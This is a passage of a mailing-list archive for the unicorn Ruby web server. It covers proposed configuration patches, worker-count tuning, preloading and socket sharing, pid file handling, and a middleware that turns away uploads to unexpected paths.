Attachments (generated using git format-patch) for text/x-diff should be
accepted by Mailman.  Attached patches are a last resort, I prefer
inline patches since I can quote/reply to them inline.

(same patch submission guidelines as git or Linux kernel)

> https://github.com/godfat/unicorn/pull/2
> 
> commit 95de5abf38a81a76af15476d4705713d2d644664
> Author: Lin Jen-Shin <godfat@godfat.org>
> Date:   Fri Jan 25 18:18:21 2013 +0800
> 
>     Add `after_app_load' hook.
> 
>     The hook would be called right after application is loaded.

Commit messages should explain why a change is made/needed, not just
what it does.

^ permalink raw reply	[relevance 0%]

* No middleware without touching RACK_ENV
@ 2013-01-25 10:52  2% Lin Jen-Shin (godfat)
  2013-01-25 18:39  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Lin Jen-Shin (godfat) @ 2013-01-25 10:52 UTC (permalink / raw)
  To: unicorn list

Hi,

This might be a bit silly, but finally I decided to bring this up.

We're running a Rails app along with another Rack app in
the same config.ru, and what I want to do is to tell Unicorn
that we don't want any middleware which Unicorn might
insert with RACK_ENV=development and RACK_ENV=
deployment, because we're adding Rack::CommonLogger
and other middleware by ourselves, while we're using
RACK_ENV=development for Rails when developing.

That is, we want to use RACK_ENV=development for Rails
because that's how it used to be, but we also don't want
those additional middleware to be inserted automatically.
This is not a problem with RACK_ENV=production.

I know this is part of the Rack spec, but I guess I
don't like this behaviour. One workaround would be
providing an `after_app_load' hook, and we add this to
the bottom of config.ru:

  ENV['RACK_ENV_ORIGINAL'] = ENV['RACK_ENV']
  ENV['RACK_ENV'] = 'none'

and add this to the unicorn configuration file:

  after_app_load do |_|
    ENV['RACK_ENV'] = ENV['RACK_ENV_ORIGINAL']
  end

This is probably a stupid hack, but I wonder if after_app_load
hook would be useful for other cases?

Or if we could have an option to turn off this Rack behaviour
simulation, like:

    default_middleware false

That might be more straightforward for what we want. Oh but
it seems it's not that easy to add this. What about an option
for unicorn?

    unicorn -E development -N

or

    unicorn -E development --no-default-middleware

This would need to be applied to `rainbows' and `zbatery', too,
though. Patches below for consideration:
(Sorry if Gmail messed the format up, but the last time
I tried, it didn't accept attachments :( What's the best way?
Links to raw patches?)

https://github.com/godfat/unicorn/pull/2

commit 95de5abf38a81a76af15476d4705713d2d644664
Author: Lin Jen-Shin <godfat@godfat.org>
Date:   Fri Jan 25 18:18:21 2013 +0800

    Add `after_app_load' hook.

    The hook would be called right after application is loaded.

diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 7651093..332bdbc 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -43,6 +43,9 @@ class Unicorn::Configurator
     :before_exec => lambda { |server|
         server.logger.info("forked child re-executing...")
       },
+    :after_app_load => lambda { |server|
+        server.logger.info("application loaded")
+      },
     :pid => nil,
     :preload_app => false,
     :check_client_connection => false,
@@ -171,6 +174,13 @@ class Unicorn::Configurator
     set_hook(:before_exec, block_given? ? block : args[0], 1)
   end

+  # sets the after_app_load hook to a given Proc object.  This
+  # Proc object will be called by the master process right
+  # after application loaded.
+  def after_app_load(*args, &block)
+    set_hook(:after_app_load, block_given? ? block : args[0], 1)
+  end
+
   # sets the timeout of worker processes to +seconds+.  Workers
   # handling the request/app.call/response cycle taking longer than
   # this time period will be forcibly killed (via SIGKILL).  This
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index aa98aeb..a3b30ee 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -14,6 +14,7 @@ class Unicorn::HttpServer
   # :stopdoc:
   attr_accessor :app, :request, :timeout, :worker_processes,
                 :before_fork, :after_fork, :before_exec,
+                :after_app_load,
                 :listener_opts, :preload_app,
                 :reexec_pid, :orig_app, :init_listeners,
                 :master_pid, :config, :ready_pipe, :user
@@ -716,6 +717,7 @@ class Unicorn::HttpServer
         Gem.refresh
       end
       self.app = app.call
+      config.after_app_load.call(self)
     end
   end






And --no-default-middleware
https://github.com/godfat/unicorn/pull/3

commit e3575db2a36e3ca2acda18bfee97bf95609a9860
Author: Lin Jen-Shin <godfat@godfat.org>
Date:   Fri Jan 25 18:38:52 2013 +0800

    Add -N or --no-default-middleware option.

    This would prevent Unicorn from adding default middleware,
    as if RACK_ENV is always none. (not development nor deployment)

    This should also apply to `rainbows' and `zbatery'.

diff --git a/bin/unicorn b/bin/unicorn
index 9962b58..415d164 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -58,6 +58,11 @@ op = OptionParser.new("", 24, '  ') do |opts|
     ENV["RACK_ENV"] = e
   end

+  opts.on("-N", "--no-default-middleware",
+          "no default middleware even if RACK_ENV is development") do |e|
+    rackup_opts[:no_default_middleware] = true
+  end
+
   opts.on("-D", "--daemonize", "run daemonized in the background") do |d|
     rackup_opts[:daemonize] = !!d
   end
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index d96ff91..f0ceffe 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -49,6 +49,8 @@ module Unicorn

       pp({ :inner_app => inner_app }) if $DEBUG

+      return inner_app if op[:no_default_middleware]
+
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
       # and Zbatery both do.  Users accustomed to the Rack::Server default

^ permalink raw reply related	[relevance 2%]

* Re: preload_app = true causing - ActiveModel::MissingAttributeError: missing attribute: some_attr
  @ 2013-01-21  7:55  4%       ` Avner Cohen
  0 siblings, 0 replies; 200+ results
From: Avner Cohen @ 2013-01-21  7:55 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

Thanks Eric, I'll use this to explore the issue.

I suspect the issue is indeed around sockets; I found a reply from you
from a while back that seems to point to memcache as another thing I
need to manage at the worker level:
http://rubyforge.org/pipermail/mongrel-unicorn/2010-January/000309.html

That being said, I'm extremely surprised there are no published unicorn
startup scripts that consider the common use case of a deployment
stack that includes:
Rails + Active Record
Redis
Memcache

I'll post my final script once I conclude the investigation.

Best Regards,
Avner Cohen

On Sun, Jan 20, 2013 at 11:17 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Avner Cohen <avner.cohen@fiverr.com> wrote:
>> Eric,
>> Thanks for the quick reply, and aplogies for not providing full info.
>> I do have these set up, here is my full configuration:
>>
>> # -*- encoding : utf-8 -*-
>> worker_processes 4
>> working_directory "."
>> listen 3000
>> timeout 120
>>
>> preload_app true
>>
>> before_fork do |server, worker|
>>   defined?(ActiveRecord::Base) and ActiveRecord::Base.connection.disconnect!
>> end
>>
>>
>> after_fork do |server, worker|
>>   defined?(ActiveRecord::Base) and ActiveRecord::Base.establish_connection
>> end
>
> Interesting.  I haven't kept up with changes in Rails over the
> past few years.  Hopefully somebody else on the list, has...
>
> Which database and adapter are you using?
>
> Do you have anything else that opens a socket at application startup?
> (e.g. memcache, redis, ..., especially anything that would interact
> with ActiveRecord/Model)
>
> Can you try just using one worker_process + preload_app=true and
> doing "lsof -p" on both the PID of the master and single worker
> to show open sockets (and any other FDs which may be inadvertently
> shared)?
>
> The only stream socket which should be shared are the listeners.
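Pulling the thread's pieces together, a hedged sketch of a unicorn config that handles all three resources per worker: the ActiveRecord hooks are from the quoted config above, while the `Redis` and `Dalli` client classes are assumptions standing in for whatever clients the app actually uses.

```ruby
preload_app true

before_fork do |server, worker|
  # sockets opened at load time must not survive the fork
  defined?(ActiveRecord::Base) and
    ActiveRecord::Base.connection.disconnect!
end

after_fork do |server, worker|
  # each worker opens its own connections
  defined?(ActiveRecord::Base) and
    ActiveRecord::Base.establish_connection
  $redis = Redis.new if defined?(Redis)             # assumption: redis gem
  $memcache = Dalli::Client.new if defined?(Dalli)  # assumption: dalli gem
end
```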

^ permalink raw reply	[relevance 4%]

* Re: Number of worker processes on hyperthreaded processor
  2012-11-19 11:23  4% ` Eric Wong
@ 2013-01-19 22:57  0%   ` Jérémy Lecour
  0 siblings, 0 replies; 200+ results
From: Jérémy Lecour @ 2013-01-19 22:57 UTC (permalink / raw)
  To: unicorn list

2012/11/19 Eric Wong <normalperson@yhbt.net>:
> Andrew Stewart <boss@airbladesoftware.com> wrote:
>> Good morning,
>>
>> The tuning page says worker_processes should be at least the number of
>> CPU cores on a dedicated server.  In the case of hyper-threading,
>> should this be the number of cores or the number of threads?
>>
>> For example the Intel Core i7-2600 Quadcore[1] has 4 cores and 8
>> threads.  Would I start my worker_processes at 4 or 8?
>
> I'd start with the number of threads, since (AFAIK) your CPU implements
> HT well (unlike the P4 family).  Modern OSes multitask well, so more
> worker processes will always work until it bumps into another limit
> (e.g. memory usage, DB connections, disk contention, ...)

Hi (in plain text this time, sorry),

I have a follow up question about this.

What about having a few different unicorns (1 for each Ruby/Rails app)
on a single server; should "at least the number of CPU cores" count
the total number of child processes, or only those per app?

To be extremely clear: if I have 2 quad-core CPUs with HT (e.g. 16
cores), can I have 16 unicorn workers per app, or in total?

Thanks


PS : I've had my first unicorns in production for a few days, and I'm
very happy about this wonderful piece of software. Thanks for
making/maintaining it.


--
Jérémy Lecour :
http://jeremy.wordpress.com - http://twitter.com/jlecour

^ permalink raw reply	[relevance 0%]

* Re: Fwd: Issue starting unicorn with non-ActiveRecord Rails app
  @ 2012-12-05  7:45  4%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-12-05  7:45 UTC (permalink / raw)
  To: unicorn list

Peter Hall <peter.hall@localstars.com> wrote:
> Hi,
> 
> I'm trying to use unicorn in a test deployment of a Rails app that
> uses Mongoid, so Activerecord isn't included in the app. When I start
> unicorn through Capistrano though, the stderr log fills up endlessly
> with identical ActiveRecord-related errors:
> 
> I, [2012-12-05T04:19:25.375952 #5096]  INFO -- : Refreshing Gem list
> I, [2012-12-05T04:19:32.941249 #5096]  INFO -- : listening on
> addr=/var/www/webapps/fugu-cp/shared/pids/unicorn.sock fd=11
> I, [2012-12-05T04:19:32.990825 #5096]  INFO -- : master process ready
> E, [2012-12-05T04:19:33.108183 #5110] ERROR -- : uninitialized
> constant ActiveRecord (NameError)

Hi Peter, this doesn't seem like an issue specific to unicorn...

Can you reproduce this issue using another server, perhaps:

  rackup -s webrick -E #{rails_env}

?

<snip>

> This repeats until I kill Unicorn.
> 
> If you're curious, the way I'm starting Unicorn in the deploy file is
> as follows:

Which version of Rails is this?   Folks more familiar with modern Rails
than myself should be able to help given more information.  (Maybe
asking on a Rails-oriented list can help, too).

I do remember it was possible to disable parts of Rails back in the day.
Most of my Rails knowledge is stuck in the Rails 1.x-era, though...

> set :unicorn_rails, "#{deploy_to}/shared/bundle/ruby/1.9.1/bin/unicorn_rails"
> run "cd #{latest_release} && bundle exec \"#{unicorn_rails} -c
> #{deploy_to}/current/config/unicorn.rb -D -E #{rails_env}\""

Probably unrelated to the issue at hand, but "unicorn" is
preferred if you're on Rails >=3.

^ permalink raw reply	[relevance 4%]

* Re: pid file deleted briefly when doing hot restart
  @ 2012-11-26  0:43  4% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-11-26  0:43 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> What follows are all the write actions related to unicorn pid file when
> doing a hot restart. Seems like a bug to me that unicorn is deleting the
> pid file before writing the new file. Is there a reason for it? It seems
> to go against that rename that aims for an atomic replace that would
> always ensure the pid file is there.

Unfortunately, pid files are inherently racy.  However, I seem to
recall that a pid file not existing for a brief moment was needed to
allow some nginx-based scripts to work.

I think unicorn differs a bit from nginx here:

nginx uses rename() to clear the way for a new pid file.  Like unicorn,
this still leaves a window where no pid file exists.

Also, nginx does not create a randomly named pid file before renaming
it, so there's a possibility another process can read an existing, but
zero-byte, file.  unicorn avoids this: if a pid file exists, it has a
pid inside it.

^ permalink raw reply	[relevance 4%]

* Re: Number of worker processes on hyperthreaded processor
  @ 2012-11-19 11:23  4% ` Eric Wong
  2013-01-19 22:57  0%   ` Jérémy Lecour
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-11-19 11:23 UTC (permalink / raw)
  To: unicorn list

Andrew Stewart <boss@airbladesoftware.com> wrote:
> Good morning,
> 
> The tuning page says worker_processes should be at least the number of
> CPU cores on a dedicated server.  In the case of hyper-threading,
> should this be the number of cores or the number of threads?
> 
> For example the Intel Core i7-2600 Quadcore[1] has 4 cores and 8
> threads.  Would I start my worker_processes at 4 or 8?

I'd start with the number of threads, since (AFAIK) your CPU implements
HT well (unlike the P4 family).  Modern OSes multitask well, so more
worker processes will always work until it bumps into another limit
(e.g. memory usage, DB connections, disk contention, ...)

You may also want more workers to amortize GC/malloc/free costs anyways.

As always, testing for your particular app is required.

> Finally, would the same apply to Nginx worker processes?

I usually run fewer nginx workers since I don't configure much
CPU/memory-intensive logic in nginx.

However, if you're dealing with large uploads or large responses/static
files which cannot fit into memory, then I suggest having enough
nginx workers to match (or exceed) your storage device count.

> [1] http://ark.intel.com/products/52213/Intel-Core-i7-2600-Processor-8M-Cache-up-to-3_80-GHz

^ permalink raw reply	[relevance 4%]

* Re: Combating nginx 499 HTTP responses during flash traffic scenario
  @ 2012-10-29 22:21  4%     ` Tom Burns
  0 siblings, 0 replies; 200+ results
From: Tom Burns @ 2012-10-29 22:21 UTC (permalink / raw)
  To: unicorn list

On Mon, Oct 29, 2012 at 5:53 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Maybe this gross hack can work for you guys.  It writes the first
> chunk of the HTTP response header out immediately after reading
> the request headers, and sends the rest once it gets the status...

Eric, thank you very much for your replies.  We'd debated this as an
alternate solution along with the two I mentioned in my original
email, and to be honest your tentative patch is cleaner than I'd had
expected this solution to look like :)

I will test this and respond back.

One of our goals in solving this problem would be to get any changes
merged back into unicorn master, and this looks like it would actually
lead to a cleaner result than having to select() on the socket.

Another side effect of the "select() in a middleware" solution was
going to be removing the NULL_IO optimization that sets rack.input to
a StringIO.

Cheers,
Tom

^ permalink raw reply	[relevance 4%]

* Re: Rack env rack.multiprocess true with single worker
  2012-10-18  6:33  4% Rack env rack.multiprocess true with single worker Petteri Räty
@ 2012-10-18  7:53  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-10-18  7:53 UTC (permalink / raw)
  To: unicorn list

Petteri Räty <betelgeuse@gentoo.org> wrote:
> Hi,
> unicorn unconditionally sets rack.multiprocess to true in the Rack
> environment. The Rack spec [0] says the following about the variable:
> 
> "true if an equivalent application object may be simultaneously invoked
> by another process, false otherwise."
> 
> When unicorn is running with a single worker this does not hold, so what
> do you think about setting the variable to false when only a single
> worker is configured? I want to use the variable to check if I can do a
> HTTP call back to the application (long story) but currently with
> unicorn and single worker this is not possible.

We cannot safely set rack.multiprocess=false.

Even if unicorn is started with a single worker, it is possible
to start more workers via SIGTTIN, and the first worker would
never see the change.


However, if you're certain nobody on your server will use SIGTTIN,
you can set the following anywhere in your unicorn config file:

	Unicorn::HttpRequest::DEFAULTS["rack.multiprocess"] = false

Changing the DEFAULTS constant has been and will remain supported
for as long as this project supports Rack 1.x (forever? :)


Since a single process deployment is a corner-case in production
deployments, I don't think it's worth the effort to jump through hoops
and set rack.multiprocess=false automatically.

^ permalink raw reply	[relevance 0%]

* Rack env rack.multiprocess true with single worker
@ 2012-10-18  6:33  4% Petteri Räty
  2012-10-18  7:53  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Petteri Räty @ 2012-10-18  6:33 UTC (permalink / raw)
  To: unicorn list

Hi,
unicorn unconditionally sets rack.multiprocess to true in the Rack
environment. The Rack spec [0] says the following about the variable:

"true if an equivalent application object may be simultaneously invoked
by another process, false otherwise."

When unicorn is running with a single worker this does not hold, so what
do you think about setting the variable to false when only a single
worker is configured? I want to use the variable to check if I can do a
HTTP call back to the application (long story) but currently with
unicorn and single worker this is not possible.

Regards,
Petteri

[0] http://rack.rubyforge.org/doc/files/SPEC.html

^ permalink raw reply	[relevance 4%]

* Re: Is a client uploading a file a slow client from unicorn's point of view?
  2012-10-09  0:39  3% Is a client uploading a file a slow client from unicorn's point of view? Jimmy Soho
@ 2012-10-09  1:58  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-10-09  1:58 UTC (permalink / raw)
  To: unicorn list

Jimmy Soho <jimmy.soho@gmail.com> wrote:
> Hi All,
> 
> I was wondering what would happen when large files were uploaded to
> our system in parallel to endpoints that don't process file uploads.
> In particular I was wondering if we're vulnerable to a simple DoS
> attack.

nginx will protect you by buffering large requests to disk, so slow
requests are taken care of (of course you may still run out of disk
space)

> The setup I tested with was nginx v1.2.4 with upload module (v2.2.0)
> configured only for location /uploads with 2 unicorn (v4.3.1) workers
> with timeout 30 secs, all running on 1 small unix box.
> 
> In a few terminals I started this command 3 times in parallel:
> 
>    $ curl -i -F importer_input=@/Users/admin/largefile.tar.gz
> https://mywebserver.com/doesnotexist
> 
> In a browser I then tried to go a page that would be served by a unicorn worker.
> 
> My expectation was that I would not get to see the web page as all
> unicorn workers would be busy with receiving / saving the upload. As
> discussed in for example this article:
> http://stackoverflow.com/questions/9592664/unicorn-rails-large-uploads.
> Or as https://github.com/dwilkie/carrierwave_direct describes it:
> 
>   "Processing and saving file uploads are typically long running tasks
> and should be done in a background process."

That is true.  It's good to move slow jobs to background processes if
possible if the bottleneck is either:

a) your application processing
b) the storage destination of your app (e.g. cloud storage)

However, if your only bottleneck is client <-> your app, then nginx
will take care of that part for you.

> But I don't see this. The page is served just fine in my setup. The
> requests for the file uploads appear in the nginx access log at the
> same time the curl upload command eventually finishes minutes later
> client side, and then it's handed off to a unicorn/rack worker
> process, which quickly returns a 404 page not found. Response times of
> less than 50ms.
> 
> What am I missing here? I'm starting to wonder what's the use of the
> nginx upload module? My understanding was that it's use was to keep
> unicorn workers available as long as a file upload was in progress,
> but it seems that without that module it does the same thing.

I'm not familiar with the nginx upload module, but stock nginx will
already do full request buffering for you.  It looks like the nginx
upload module[1] is mostly meant for standalone apps written for
nginx, and not when nginx is used as a proxy for Rails app...

[1] http://www.grid.net.ru/nginx/upload.en.html

> Another question (more an nginx question though I guess): is there a
> way to kill an upload request as early as possible if the request is
> not made against known / accepted URI locations, instead of waiting
> for it to be completely uploaded to our system and/or waiting for it
> to reach the unicorn workers?

I'm not sure if nginx has this functionality, but unicorn lazily buffers
uploads.  So your upload will be fully read by nginx, but unicorn
will only read the uploaded request body if your application wants to
read it.

Unfortunately, I think most application frameworks (e.g. Rails) will
attempt to do all the multipart parsing up front.  To get around this,
you'll probably want some middleware along the following lines (and
placed in front of whichever part of your stack calls
Rack::Multipart.parse_multipart)

class BadUploadStopper
  def initialize(app)
    @app = app
  end

  def call(env)
    case env["REQUEST_METHOD"]
    when "POST", "PUT"
      case env["PATH_INFO"]
      when "/upload_allowed"
        @app.call(env) # forward to the app
      else
        # bad path, don't waste time with @app.call
        [ 403, {}, [ "Go away\n" ] ]
      end
    else
      @app.call(env)  # forward to the app
    end
  end
end

------------------- config.ru ---------------------
use BadUploadStopper
run YourApp.new

^ permalink raw reply	[relevance 0%]

* Is a client uploading a file a slow client from unicorn's point of view?
@ 2012-10-09  0:39  3% Jimmy Soho
  2012-10-09  1:58  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jimmy Soho @ 2012-10-09  0:39 UTC (permalink / raw)
  To: mongrel-unicorn

Hi All,

I was wondering what would happen when large files were uploaded to
our system in parallel to endpoints that don't process file uploads.
In particular I was wondering if we're vulnerable to a simple DoS
attack.

The setup I tested with was nginx v1.2.4 with upload module (v2.2.0)
configured only for location /uploads with 2 unicorn (v4.3.1) workers
with timeout 30 secs, all running on 1 small unix box.

In a few terminals I started this command 3 times in parallel:

   $ curl -i -F importer_input=@/Users/admin/largefile.tar.gz
https://mywebserver.com/doesnotexist

In a browser I then tried to go a page that would be served by a unicorn worker.

My expectation was that I would not get to see the web page as all
unicorn workers would be busy with receiving / saving the upload. As
discussed in for example this article:
http://stackoverflow.com/questions/9592664/unicorn-rails-large-uploads.
Or as https://github.com/dwilkie/carrierwave_direct describes it:

  "Processing and saving file uploads are typically long running tasks
and should be done in a background process."

But I don't see this. The page is served just fine in my setup. The
requests for the file uploads appear in the nginx access log at the
same time the curl upload command eventually finishes minutes later
client side, and then it's handed off to a unicorn/rack worker
process, which quickly returns a 404 page not found. Response times of
less than 50ms.

What am I missing here? I'm starting to wonder what's the use of the
nginx upload module? My understanding was that its use was to keep
unicorn workers available as long as a file upload was in progress,
but it seems that without that module it does the same thing.

Another question (more an nginx question though I guess): is there a
way to kill an upload request as early as possible if the request is
not made against known / accepted URI locations, instead of waiting
for it to be completely uploaded to our system and/or waiting for it
to reach the unicorn workers?


Cheers,
Jim

^ permalink raw reply	[relevance 3%]

* Re: Unused Unicorn processes
  2012-08-21  9:11  4%   ` Eric Wong
@ 2012-08-22 18:16  0%     ` Konstantin Gredeskoul
  0 siblings, 0 replies; 200+ results
From: Konstantin Gredeskoul @ 2012-08-22 18:16 UTC (permalink / raw)
  To: unicorn list

Thanks Eric!  Appreciate well thought out answers.

We are actually using Rainbows also, in a project where long
server-side HTTP calls are part of the application design and are
necessary, and it's working out really well.

Our main web app mostly spends its time in CPU cycles serving web
pages (about 80% of the request time), and 20% in database operations.

Thanks again
K

On Tue, Aug 21, 2012 at 2:11 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Konstantin Gredeskoul <kig@wanelo.com> wrote:
>> Greetings!
>>
>> I have a question on optimal # of unicorn worker processes.
>>
>> We are running Unicorn 4.3.1 + Rails 3.2.6 (without threading), on
>> ruby 1.9.3-p194, hosted on SmartOS/Joyent.
>>
>> At the moment, unicorns are configured to start 30 worker processes. I
>> know this is a lot, and I am going to reduce this number. But in
>> trying to figure out what is a more appropriate number of workers to
>> run, I noticed something interesting that I couldn't explain.
>>
>> If I look at the process table on each machine (see top output below),
>> I notice that some unicorn processes are heavily used (and have
>> accumulated longer CPU times, as well as have grown their RAM usage
>> since boot time), but other processes (at the bottom of the top
>> output) appear to potentially not having been used at all.  There are
>> several processes with RSS size of 143Mb, which I believe is unicorn
>> size before it processes any requests.
>>
>> What I am gathering from this, is that only 16 unicorn processes are
>> actually processing requests, while the rest are just sitting there
>> idle.
>>
>> Is this expected behavior?
>
> It's not _unexpected_ if your load is low.  The OS scheduler does the
> load balancing itself as unicorn uses non-blocking accept().  The
> scheduler may choose busier processes because they're likely to be
> hotter in cache/memory.
>
> So you're probably getting better performance than if you had perfectly
> balanced traffic.
>
> Another possible explanation is something is killing some workers
> (timeout, or crash bugs; check stderr logs to confirm).  But even in a
> situation where workers never die, it's perfectly normal to see workers
> that never/rarely serve traffic.
>
>> This Joyent SmartMachine can burst up to 8 cores. Given that our web
>> requests spend only 80% of their time in ruby, I figured we could run
>> 10 unicorn processes for maximum efficiency.  However seeing that 16
>> are actually used I am curious whether 16 is actually a better number.
>
> It depends what your app is waiting on.
>
> The only rule is your machine should not be swap thrashing under
> peak load.
>
> Extra workers won't be detrimental as long as you:
> 1) have enough memory
> 2) have enough backend resources (e.g. DB connections)
>
> I know of deployments that run 30 processes/core because the app spends
> much time waiting on slow HTTP/DB requests[1]
>
> But if your app is completely bound by resources local to a machine (no
> external DB/HTTP/memcached/redis/etc requests), then a 1:1 worker:core
> (or even 1:1 worker:disk) relationship will work, too.
>
>
>
> [1] Arguably a multi-threaded or non-blocking server such as Rainbows!
> would be most efficient of machine resources if you're waiting on HTTP
> calls, but the developers decided human time was more important and
> did not want to worry about thread-safety.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying



-- 

Konstantin Gredeskoul
CTO :: Wanelo Inc
cell: (415) 265 1054

^ permalink raw reply	[relevance 0%]

* Re: Unused Unicorn processes
  @ 2012-08-21  9:11  4%   ` Eric Wong
  2012-08-22 18:16  0%     ` Konstantin Gredeskoul
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2012-08-21  9:11 UTC (permalink / raw)
  To: unicorn list

Konstantin Gredeskoul <kig@wanelo.com> wrote:
> Greetings!
> 
> I have a question on optimal # of unicorn worker processes.
> 
> We are running Unicorn 4.3.1 + Rails 3.2.6 (without threading), on
> ruby 1.9.3-p194, hosted on SmartOS/Joyent.
> 
> At the moment, unicorns are configured to start 30 worker processes. I
> know this is a lot, and I am going to reduce this number. But in
> trying to figure out what is a more appropriate number of workers to
> run, I noticed something interesting that I couldn't explain.
> 
> If I look at the process table on each machine (see top output below),
> I notice that some unicorn processes are heavily used (and have
> accumulated longer CPU times, as well as have grown their RAM usage
> since boot time), but other processes (at the bottom of the top
> output) appear to potentially not have been used at all.  There are
> several processes with RSS size of 143Mb, which I believe is unicorn
> size before it processes any requests.
> 
> What I am gathering from this, is that only 16 unicorn processes are
> actually processing requests, while the rest are just sitting there
> idle.
> 
> Is this expected behavior?

It's not _unexpected_ if your load is low.  The OS scheduler does the
load balancing itself as unicorn uses non-blocking accept().  The
scheduler may choose busier processes because they're likely to be
hotter in cache/memory.

So you're probably getting better performance than if you had perfectly
balanced traffic.
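
This shared-accept model can be sketched in plain Ruby (an illustrative
sketch only, not unicorn's actual code; the worker count and replies
are made up):

```ruby
require 'socket'

# Several forked workers share one listen socket and race on
# non-blocking accept(); the kernel decides which sleeping worker
# wakes up, so under light load a few "hot" workers may take every
# connection while others stay idle.
server = TCPServer.new('127.0.0.1', 0)
port = server.addr[1]

workers = 3.times.map do |n|
  fork do
    loop do
      begin
        client = server.accept_nonblock
        client.write("worker #{n}\n")
        client.close
      rescue IO::WaitReadable
        IO.select([server]) # sleep until a connection is pending
        retry
      end
    end
  end
end

# make a few requests; any subset of the workers may serve them
replies = 5.times.map { TCPSocket.open('127.0.0.1', port, &:read) }

workers.each { |pid| Process.kill(:TERM, pid) }
workers.each { |pid| Process.wait(pid) }
```

Under a heavier, sustained load the idle workers would start winning
the accept() race as the hot ones became busy.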

Another possible explanation is something is killing some workers
(timeout, or crash bugs, check stderr logs to confirm).  But even in a
situation where workers never die, it's perfectly normal to see workers
that never/rarely serve traffic.

> This Joyent SmartMachine can burst up to 8 cores. Given that our web
> requests spend only 80% of their time in ruby, I figured we could run
> 10 unicorn processes for maximum efficiency.  However seeing that 16
> are actually used I am curious whether 16 is actually a better number.

It depends what your app is waiting on.

The only rule is your machine should not be swap thrashing under
peak load.

Extra workers won't be detrimental as long as you:
1) have enough memory
2) have enough backend resources (e.g. DB connections)

I know of deployments that run 30 processes/core because the app spends
much time waiting on slow HTTP/DB requests[1]

But if your app is completely bound by resources local to a machine (no
external DB/HTTP/memcached/redis/etc requests), then a 1:1 worker:core
(or even 1:1 worker:disk) relationship will work, too.



[1] Arguably a multi-threaded or non-blocking server such as Rainbows!
would be most efficient of machine resources if you're waiting on HTTP
calls, but the developers decided human time was more important and
did not want to worry about thread-safety.

^ permalink raw reply	[relevance 4%]

* Re: Address already in use
  @ 2012-06-25 23:57  4%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2012-06-25 23:57 UTC (permalink / raw)
  To: unicorn list

Manuel Palenciano Guerrero <mpalenciano@gmail.com> wrote:
> Hi,
> 
> First, thanks Eric, Jérémy and Aaron for replying. I really appreciate it.
> 
> Yes Eric, I can see the line... "inherited addr=/tmp/unicorn.app.sock fd=..."
> 
> here is the full log
> 
> -------------------------------------------------
> I, [2012-06-21T11:40:44.282224 #29212]  INFO -- : inherited addr=/tmp/unicorn.sublimma_staging.sock fd=3
> I, [2012-06-21T11:40:44.282480 #29212]  INFO -- : Refreshing Gem list
> master process ready
> worker=0 ready
> worker=1 ready
> reaped #<Process::Status: pid=28683,exited(0)> worker=0
> reaped #<Process::Status: pid=28684,exited(0)> worker=1
> master complete

Ugh, lack of formatting caused by Rails mucking with Logger is annoying.
Can you add the following to your unicorn config?

  Configurator::DEFAULTS[:logger].formatter = Logger::Formatter.new

(that's from unicorn.bogomips.org/FAQ.html)

> E, [2012-06-21T11:40:46.386486 #29401] ERROR -- : adding listener failed addr=/tmp/unicorn.sublimma_staging.sock (in use)

I'm curious if PID=29401 is a worker of pid 29212.  Or you're starting
another master somewhere...

> /var/www/sublimma/staging/shared/bundle/ruby/1.8/gems/unicorn-4.3.0/lib/unicorn/socket_helper.rb:140:in `initialize': Address already in use - /tmp/unicorn.sublimma_staging.sock (Errno::EADDRINUSE)
> -------------------------------------------------
> 
> my unicorn.rb: https://gist.github.com/2991110

Did you share the correct config?  Your config has:

  listen "/tmp/unicorn.app_production.sock"

But your log shows: /tmp/unicorn.sublimma_staging.sock

^ permalink raw reply	[relevance 4%]

* Re: app error: Socket is not connected (Errno::ENOTCONN)
  2012-04-27 19:51  0%     ` Eric Wong
  2012-04-27 19:53  0%       ` Eric Wong
@ 2012-04-27 20:30  0%       ` Matt Smith
  1 sibling, 0 replies; 200+ results
From: Matt Smith @ 2012-04-27 20:30 UTC (permalink / raw)
  To: Eric Wong; +Cc: mongrel-unicorn, George, Joel Nimety

On Fri, Apr 27, 2012 at 12:51 PM, Eric Wong <normalperson@yhbt.net> wrote:
> George <lists@SouthernOhio.net> wrote:
>> Just fyi, my dev logs are now rife with these: http://j.mp/IezMAu
>>
>> Will plug your patch in, but will have to figure out another option for
>> heroku deployment.
>
> Is this affecting your heroku deployment?  What OS/kernel version
> are you running?  From what Joel and Matt say, it could be more likely
> to trigger on *BSD-based systems.

I just tried on a 64-bit Ubuntu 11.10 (kernel 3.0.0-17-generic), ruby
1.9.3p0 (2011-10-30 revision 33570) [x86_64-linux]. No issue. Reloaded
several pages, many times. No ENOTCONN. Not one. Same app.

Neither on ruby 1.9.3p194 (2012-04-20 revision 35410) [x86_64-linux].

BSD issue?

^ permalink raw reply	[relevance 0%]

* Re: app error: Socket is not connected (Errno::ENOTCONN)
